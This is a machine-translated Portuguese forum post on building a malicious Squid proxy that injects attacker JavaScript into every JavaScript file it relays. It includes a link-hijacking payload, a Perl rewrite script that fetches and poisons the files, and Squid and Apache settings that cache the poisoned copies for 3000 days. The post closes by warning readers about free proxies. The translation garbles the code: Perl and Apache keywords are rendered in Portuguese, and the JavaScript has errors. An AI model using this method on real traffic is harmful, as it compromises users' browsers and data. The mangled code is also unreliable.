Este post foi editado pela última vez por Mo Xiaowen em 2015-6-7 às 23:19
Isso pode ser feito simplesmente modificando a configuração do SQUID
O que é o SQUID?
Squid é um software que armazena em cache dados da Internet, recebe solicitações de download dos usuários e processa automaticamente os dados baixados. Quando um usuário quer baixar uma página inicial, ele pode enviar um pedido para o Squid, pedir para o Squid baixá-lo em seu nome, então o Squid se conecta ao site e solicita a página inicial, e então envia a página inicial para o usuário mantendo um backup; quando outros usuários solicitam a mesma página, o Squid imediatamente envia o backup salvo para o usuário, para que o usuário sinta que a velocidade é bastante rápida. O Squid pode fazer proxy protocolos como HTTP, FTP, GOPHER, SSL e WAIS, e o Squid pode lidar com isso automaticamente, e você pode configurar o Squid de acordo com suas necessidades para filtrar itens indesejados.
O Squid pode funcionar em muitos sistemas operacionais, como AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2, etc.
A implementação é muito simples:
1. Instalar o Squid em um servidor Linux.
2. Modificar o código do servidor, inserir um pedaço do nosso código em todo o javascrip transmitido e enviá-lo.
3. Defina o tempo de cache do nosso arquivo js modificado o mais alto possível.
Esse método também se aplica a sites com SSL ativado; se o site carregar um recurso inseguro (como jquery para um site HTTP), a maioria dos navegadores dará um aviso, mas poucas pessoas prestam atenção.
Chema disse que mais de 5.000 pessoas usaram seu proxy poucos dias depois que ele o liberou, e a maioria usou para fazer coisas ruins, porque usaram o proxy, então achavam que era anônimo e seguro, mas nunca esperaram que o servidor proxy também fizesse coisas ruins.
Crie seu servidor proxy malicioso
Se você já tem um servidor proxy Squid, também precisará de um servidor web como o Apache.
Passo 1: Criar uma carga útil
Eu uso um script simples como demonstração para apontar todos os hiperlinks para o meu site.
/etc/squid/payload.js
[mw_shl_code=javascrip remove t, true]for(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
Passo 2: Escreva um script para infectar todos os arquivos JS
/etc/squid/poison.pl
[mw_shl_code=perl,true]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
enquanto (<>)
{
mordida $_;
if($_ =- /(.*.js)/i)
{
$url = $1;
system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
system("chmod o+r /var/www/tmp/$pid-$count.js");
system("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
imprimir "http://127.0.0.1:80/tmp/$pid-$count.js";
}
senão
{
imprima "$_";
}
$count++;
}[/mw_shl_code]
Esse script usa o wget para obter o javascrip original da página e remover o arquivo t, depois adicionar o código em /etc/squid/payload.js e enviar o arquivo modificado para o cliente, enquanto você precisa criar o diretório /var/www/tmp e permitir que o squid escreva arquivos nele. Esse diretório armazena os arquivos js modificados.
Passo 3 Combine o script acima com o Squid
Adicione em /etc/squid/squid.conf
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Passo 4: Faça o cache nunca falhar
/var/www/tmp/.htaccess
[mw_shl_code=html,true] Expira Ativo em
ExpiraPadrão "acesso mais 3000 dias"[/mw_shl_code]
Isso vai dizer ao Apache para dar um longo prazo de validade até o usuário limpar o cache.
Se você conectar esse proxy, clicar em qualquer hiperlink vai redirecionar você para o meu site, e o cache ainda existirá mesmo que você não use o proxy depois. Eu só usei uma carga útil não agressiva, e com esse método, hackers podem fazer muito mais. Então, lembre-se e aos amigos de terem cuidado ao usar proxies gratuitos.
|
Publicado em 19/01/2015 02:34:56
|
|
|
|
Publicado em 19/01/2015 08:48:45
|
Senhorio|
Publicado em 20/01/2015 14:36:06
|
